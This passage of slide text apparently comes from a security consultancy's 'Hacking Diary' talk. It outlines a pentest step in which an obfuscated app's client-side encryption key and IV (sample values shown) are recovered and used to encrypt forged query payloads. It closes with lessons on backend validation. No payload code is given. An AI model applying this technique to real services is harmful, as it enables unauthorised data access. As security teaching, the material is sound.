![Page 70: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/70.jpg)
74
Assume that:
IV = zuch58qsgkwtvasj
Key = ghdhrz3qvet3akz6j25bzajbohwh4rnw
Found key and IV
![Page 71: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/71.jpg)
75
Manipulate payload for querying data
![Page 72: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/72.jpg)
76
Manipulate payload for querying data
We could craft a malicious payload and encrypt it with the same key and IV then send to the server !
![Page 73: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/73.jpg)
77
Lesson Learned
• Hacker still win the client-side encryption even the app is obfuscated
• Validate all request data at the backend server
![Page 74: MAYASEVEN’s Hacking DiaryHacking Diary. 2 Who are we? Nop Phoomthaisong Cybersecurity Consultants, ... • Reflection of input arises when data is copied from a request and echoed](https://reader030.vdocument.in/reader030/viewer/2022013020/5e83bec47e334278a25e90b3/html5/thumbnails/74.jpg)
MAYASEVEN 78